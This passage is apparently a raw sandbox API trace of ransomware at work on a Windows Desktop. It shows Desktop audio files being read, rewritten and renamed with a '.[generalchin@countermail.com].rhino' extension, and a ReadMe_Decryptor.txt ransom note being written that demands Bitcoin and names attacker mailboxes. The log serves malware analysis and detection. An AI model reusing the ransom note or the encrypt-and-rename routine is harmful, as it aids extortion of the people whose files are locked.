hHeap=0x6d0000, dwFlags=0x0, lpMem=0x703e78 | out: hHeap=0x6d0000) returned 1 [0078.021] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x13c) returned 0x721d00 [0078.021] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x721c20 | out: hHeap=0x6d0000) returned 1 [0078.021] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1da) returned 0x714b90 [0078.022] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x721d00 | out: hHeap=0x6d0000) returned 1 [0078.022] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2c7) returned 0x721c20 [0078.022] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x714b90 | out: hHeap=0x6d0000) returned 1 [0078.022] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x42a) returned 0x6f2da0 [0078.022] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x721c20 | out: hHeap=0x6d0000) returned 1 [0078.022] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x63f) returned 0x6f45b8 [0078.022] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f2da0 | out: hHeap=0x6d0000) returned 1 [0078.022] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x95e) returned 0x6ee498 [0078.022] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f45b8 | out: hHeap=0x6d0000) returned 1 [0078.022] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xe0d) returned 0x6eee00 [0078.022] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6ee498 | out: hHeap=0x6d0000) returned 1 [0078.022] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1536) returned 0x6efc18 [0078.022] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6eee00 | out: hHeap=0x6d0000) returned 1 [0078.022] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1fbf) returned 0x715898 [0078.022] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6efc18 | out: hHeap=0x6d0000) returned 1 [0078.022] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2f8d) returned 0x6ee498 [0078.022] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x715898 | out: hHeap=0x6d0000) returned 1 [0078.022] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x4742) returned 0x715898 [0078.022] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6ee498 | out: hHeap=0x6d0000) returned 1 [0078.022] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x6ad1) returned 0x75b538 [0078.022] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x715898 | out: hHeap=0x6d0000) returned 1 [0078.022] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa028) returned 0x762018 [0078.023] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x75b538 | out: hHeap=0x6d0000) returned 1 [0078.023] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xf02a) returned 0x76c048 [0078.027] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x762018 | out: hHeap=0x6d0000) returned 1 [0078.028] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1682d) returned 0x77b080 [0078.030] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x76c048 | out: hHeap=0x6d0000) returned 1 [0078.031] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x21c32) returned 0x7918b8 [0078.032] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x77b080 | out: hHeap=0x6d0000) returned 1 [0078.033] WriteFile (in: hFile=0x124, lpBuffer=0x7918c0*, nNumberOfBytesToWrite=0x16951, lpNumberOfBytesWritten=0x4af2ac, lpOverlapped=0x0 | out: lpBuffer=0x7918c0*, lpNumberOfBytesWritten=0x4af2ac*=0x16951, lpOverlapped=0x0) returned 1 [0078.033] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x7918b8 | out: hHeap=0x6d0000) returned 1 [0078.033] UnlockFile (hFile=0x124, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0x16951, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0078.033] CloseHandle (hObject=0x124) returned 1 [0078.037] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x80) returned 0x6eb8f0 [0078.037] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xc0) returned 0x6f36d0 [0078.037] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6eb8f0 | out: hHeap=0x6d0000) returned 1 [0078.037] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\-of5Uvp7Nk4OWATL4.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\-of5uvp7nk4owatl4.wav"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\-of5Uvp7Nk4OWATL4.wav.[generalchin@countermail.com].rhino" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\-of5uvp7nk4owatl4.wav.[generalchin@countermail.com].rhino"), dwFlags=0x2) returned 1 [0078.038] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f36d0 | out: hHeap=0x6d0000) returned 1 [0078.039] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x703f80 | out: hHeap=0x6d0000) returned 1 [0078.039] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x744cd8 | out: hHeap=0x6d0000) returned 1 [0078.039] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x50) returned 0x6f6970 [0078.039] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x50) returned 0x6f69c8 [0078.039] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x80) returned 0x6eb8f0 [0078.039] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f69c8 | out: hHeap=0x6d0000) returned 1 [0078.039] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ReadMe_Decryptor.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\readme_decryptor.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x124 [0078.039] lstrlenA (lpString="All your files have been encrypted due to a security problem with your PC. If you want to restore them, write us to the e-mail:\n1)generalchin@countermail.com\n2)generalchin@smime.ninja (if you do not receive a response from the first mailbox)\n\nYou have to pay for decryption in Bitcoins. The price depends on how fast you write to us.\nAfter payment we will send you the decryption tool that will decrypt all your files.\n\nFree decryption as guarantee\nBefore paying you can send us up to 1 files for free decryption.\nThe total size of files must be less than 500 Kb (non archived), and files should not contain valuable information. (databases,backups, large excel sheets, etc.)\n") returned 676 [0078.039] WriteFile (in: hFile=0x124, lpBuffer=0x279dd0*, nNumberOfBytesToWrite=0x2a4, lpNumberOfBytesWritten=0x4af304, lpOverlapped=0x0 | out: lpBuffer=0x279dd0*, lpNumberOfBytesWritten=0x4af304*=0x2a4, lpOverlapped=0x0) returned 1 [0078.041] CloseHandle (hObject=0x124) returned 1 [0078.042] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6eb8f0 | out: hHeap=0x6d0000) returned 1 [0078.042] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\5k-TNfiKa_1gmYoWjf1.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\5k-tnfika_1gmyowjf1.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x124 [0078.042] GetFileSize (in: hFile=0x124, lpFileSizeHigh=0x4af30c | out: lpFileSizeHigh=0x4af30c*=0x0) returned 0x18a75 [0078.042] LockFile (hFile=0x124, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0x18b95, nNumberOfBytesToLockHigh=0x0) returned 1 [0078.042] SetFilePointerEx (in: hFile=0x124, liDistanceToMove=0xffffffe0, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0078.042] ReadFile (in: hFile=0x124, lpBuffer=0x4af2cc, nNumberOfBytesToRead=0x20, lpNumberOfBytesRead=0x4af2ac, lpOverlapped=0x0 | out: lpBuffer=0x4af2cc*, lpNumberOfBytesRead=0x4af2ac*=0x20, lpOverlapped=0x0) returned 1 [0078.043] SetFilePointerEx (in: hFile=0x124, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0078.043] ReadFile (in: hFile=0x124, lpBuffer=0x3110040, nNumberOfBytesToRead=0x18a75, lpNumberOfBytesRead=0x4af2ac, lpOverlapped=0x0 | out: lpBuffer=0x3110040*, lpNumberOfBytesRead=0x4af2ac*=0x18a75, lpOverlapped=0x0) returned 1 [0078.044] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x4) returned 0x6f5760 [0078.044] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f5760 | out: hHeap=0x6d0000) returned 1 [0078.044] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2c) returned 0x715080 [0078.044] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x40) returned 0x6e6b00 [0078.044] GetLastError () returned 0x0 [0078.044] SetLastError (dwErrCode=0x0) [0078.044] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x715080 | out: hHeap=0x6d0000) returned 1 [0078.044] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x18a98) returned 0x744cd8 [0078.045] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e6b00 | out: hHeap=0x6d0000) returned 1 [0078.045] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x100) returned 0x703e78 [0078.045] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x180) returned 0x703f80 [0078.045] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x703e78 | out: hHeap=0x6d0000) returned 1 [0078.045] SetFilePointerEx (in: hFile=0x124, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0078.045] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1) returned 0x6f5760 [0078.045] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2) returned 0x6f5750 [0078.045] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f5760 | out: hHeap=0x6d0000) returned 1 [0078.045] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x3) returned 0x6f5760 [0078.045] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f5750 | out: hHeap=0x6d0000) returned 1 [0078.045] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x4) returned 0x6f5750 [0078.045] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f5760 | out: hHeap=0x6d0000) returned 1 [0078.045] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x6) returned 0x6f5760 [0078.045] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f5750 | out: hHeap=0x6d0000) returned 1 [0078.045] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x9) returned 0x714170 [0078.045] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f5760 | out: hHeap=0x6d0000) returned 1 [0078.045] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xd) returned 0x714188 [0078.045] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x714170 | out: hHeap=0x6d0000) returned 1 [0078.045] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x13) returned 0x709f08 [0078.045] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x714188 | out: hHeap=0x6d0000) returned 1 [0078.045] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1c) returned 0x713d48 [0078.045] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x709f08 | out: hHeap=0x6d0000) returned 1 [0078.045] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2a) returned 0x715080 [0078.045] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x713d48 | out: hHeap=0x6d0000) returned 1 [0078.045] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x3f) returned 0x6e6b00 [0078.045] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x715080 | out: hHeap=0x6d0000) returned 1 [0078.045] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x5e) returned 0x6f36d0 [0078.045] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e6b00 | out: hHeap=0x6d0000) returned 1 [0078.045] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x8d) returned 0x703e78 [0078.046] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f36d0 | out: hHeap=0x6d0000) returned 1 [0078.046] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xd3) returned 0x721c20 [0078.046] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x703e78 | out: hHeap=0x6d0000) returned 1 [0078.046] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x13c) returned 0x721d00 [0078.046] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x721c20 | out: hHeap=0x6d0000) returned 1 [0078.046] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1da) returned 0x714b90 [0078.046] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x721d00 | out: hHeap=0x6d0000) returned 1 [0078.046] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2c7) returned 0x721c20 [0078.046] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x714b90 | out: hHeap=0x6d0000) returned 1 [0078.046] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x42a) returned 0x6f2da0 [0078.046] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x721c20 | out: hHeap=0x6d0000) returned 1 [0078.046] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x63f) returned 0x6f45b8 [0078.046] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f2da0 | out: hHeap=0x6d0000) returned 1 [0078.046] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x95e) returned 0x6ee498 [0078.046] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f45b8 | out: hHeap=0x6d0000) returned 1 [0078.046] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xe0d) returned 0x6eee00 [0078.046] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6ee498 | out: hHeap=0x6d0000) returned 1 [0078.046] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1536) returned 0x6efc18 [0078.046] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6eee00 | out: hHeap=0x6d0000) returned 1 [0078.046] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1fbf) returned 0x715898 [0078.047] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6efc18 | out: hHeap=0x6d0000) returned 1 [0078.047] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2f8d) returned 0x6ee498 [0078.047] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x715898 | out: hHeap=0x6d0000) returned 1 [0078.049] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x4742) returned 0x715898 [0078.049] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6ee498 | out: hHeap=0x6d0000) returned 1 [0078.049] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x6ad1) returned 0x75d778 [0078.102] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x715898 | out: hHeap=0x6d0000) returned 1 [0078.102] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa028) returned 0x764258 [0078.102] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x75d778 | out: hHeap=0x6d0000) returned 1 [0078.103] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xf02a) returned 0x76e288 [0078.104] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x764258 | out: hHeap=0x6d0000) returned 1 [0078.104] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1682d) returned 0x77d2c0 [0078.105] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x76e288 | out: hHeap=0x6d0000) returned 1 [0078.105] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x21c32) returned 0x793af8 [0078.106] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x77d2c0 | out: hHeap=0x6d0000) returned 1 [0078.107] WriteFile (in: hFile=0x124, lpBuffer=0x793b00*, nNumberOfBytesToWrite=0x18b95, lpNumberOfBytesWritten=0x4af2ac, lpOverlapped=0x0 | out: lpBuffer=0x793b00*, lpNumberOfBytesWritten=0x4af2ac*=0x18b95, lpOverlapped=0x0) returned 1 [0078.107] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x793af8 | out: hHeap=0x6d0000) returned 1 [0078.107] UnlockFile (hFile=0x124, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0x18b95, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0078.107] CloseHandle (hObject=0x124) returned 1 [0078.109] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x80) returned 0x6eb8f0 [0078.110] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xd0) returned 0x6f9208 [0078.110] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6eb8f0 | out: hHeap=0x6d0000) returned 1 [0078.110] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\5k-TNfiKa_1gmYoWjf1.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\5k-tnfika_1gmyowjf1.wav"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\5k-TNfiKa_1gmYoWjf1.wav.[generalchin@countermail.com].rhino" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\5k-tnfika_1gmyowjf1.wav.[generalchin@countermail.com].rhino"), dwFlags=0x2) returned 1 [0078.111] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f9208 | out: hHeap=0x6d0000) returned 1 [0078.111] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x703f80 | out: hHeap=0x6d0000) returned 1 [0078.111] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x744cd8 | out: hHeap=0x6d0000) returned 1 [0078.111] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x50) returned 0x6f69c8 [0078.111] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f6970 | out: hHeap=0x6d0000) returned 1 [0078.111] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x50) returned 0x6f6970 [0078.111] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x80) returned 0x6eb8f0 [0078.111] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f6970 | out: hHeap=0x6d0000) returned 1 [0078.111] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ReadMe_Decryptor.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\readme_decryptor.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0078.111] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6eb8f0 | out: hHeap=0x6d0000) returned 1 [0078.111] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\833tdY5_MH34U4.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\833tdy5_mh34u4.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x124 [0078.111] GetFileSize (in: hFile=0x124, lpFileSizeHigh=0x4af30c | out: lpFileSizeHigh=0x4af30c*=0x0) returned 0x16eaf [0078.111] LockFile (hFile=0x124, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0x16fcf, nNumberOfBytesToLockHigh=0x0) returned 1 [0078.112] SetFilePointerEx (in: hFile=0x124, liDistanceToMove=0xffffffe0, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0078.112] ReadFile (in: hFile=0x124, lpBuffer=0x4af2cc, nNumberOfBytesToRead=0x20, lpNumberOfBytesRead=0x4af2ac, lpOverlapped=0x0 | out: lpBuffer=0x4af2cc*, lpNumberOfBytesRead=0x4af2ac*=0x20, lpOverlapped=0x0) returned 1 [0078.113] SetFilePointerEx (in: hFile=0x124, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0078.113] ReadFile (in: hFile=0x124, lpBuffer=0x3110040, nNumberOfBytesToRead=0x16eaf, lpNumberOfBytesRead=0x4af2ac, lpOverlapped=0x0 | out: lpBuffer=0x3110040*, lpNumberOfBytesRead=0x4af2ac*=0x16eaf, lpOverlapped=0x0) returned 1 [0078.114] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x4) returned 0x6f5760 [0078.114] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f5760 | out: hHeap=0x6d0000) returned 1 [0078.114] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2c) returned 0x715080 [0078.114] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x40) returned 0x6e6b00 [0078.114] GetLastError () returned 0x0 [0078.114] SetLastError (dwErrCode=0x0) [0078.114] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x715080 | out: hHeap=0x6d0000) returned 1 [0078.114] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x16ed2) returned 0x744cd8 [0078.115] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e6b00 | out: hHeap=0x6d0000) returned 1 [0078.115] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x100) returned 0x703e78 [0078.115] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x180) returned 0x703f80 [0078.115] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x703e78 | out: hHeap=0x6d0000) returned 1 [0078.115] SetFilePointerEx (in: hFile=0x124, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0078.115] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1) returned 0x6f5760 [0078.115] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2) returned 0x6f5750 [0078.115] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f5760 | out: hHeap=0x6d0000) returned 1 [0078.115] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x3) returned 0x6f5760 [0078.115] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f5750 | out: hHeap=0x6d0000) returned 1 [0078.115] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x4) returned 0x6f5750 [0078.115] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f5760 | out: hHeap=0x6d0000) returned 1 [0078.115] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x6) returned 0x6f5760 [0078.115] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f5750 | out: hHeap=0x6d0000) returned 1 [0078.115] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x9) returned 0x714188 [0078.115] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f5760 | out: hHeap=0x6d0000) returned 1 [0078.115] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xd) returned 0x714170 [0078.115] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x714188 | out: hHeap=0x6d0000) returned 1 [0078.115] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x13) returned 0x709f08 [0078.115] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x714170 | out: hHeap=0x6d0000) returned 1 [0078.115] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1c) returned 0x713d48 [0078.115] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x709f08 | out: hHeap=0x6d0000) returned 1 [0078.115] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2a) returned 0x715080 [0078.115] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x713d48 | out: hHeap=0x6d0000) returned 1 [0078.115] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x3f) returned 0x6e6b00 [0078.115] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x715080 | out: hHeap=0x6d0000) returned 1 [0078.115] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x5e) returned 0x6f36d0 [0078.115] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e6b00 | out: hHeap=0x6d0000) returned 1 [0078.115] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x8d) returned 0x703e78 [0078.115] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f36d0 | out: hHeap=0x6d0000) returned 1 [0078.115] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xd3) returned 0x721c20 [0078.116] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x703e78 | out: hHeap=0x6d0000) returned 1 [0078.116] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x13c) returned 0x721d00 [0078.116] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x721c20 | out: hHeap=0x6d0000) returned 1 [0078.116] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1da) returned 0x714b90 [0078.116] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x721d00 | out: hHeap=0x6d0000) returned 1 [0078.116] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2c7) returned 0x721c20 [0078.116] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x714b90 | out: hHeap=0x6d0000) returned 1 [0078.116] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x42a) returned 0x6f2da0 [0078.116] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x721c20 | out: hHeap=0x6d0000) returned 1 [0078.116] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x63f) returned 0x6f45b8 [0078.116] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f2da0 | out: hHeap=0x6d0000) returned 1 [0078.116] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x95e) returned 0x6ee498 [0078.116] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f45b8 | out: hHeap=0x6d0000) returned 1 [0078.116] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xe0d) 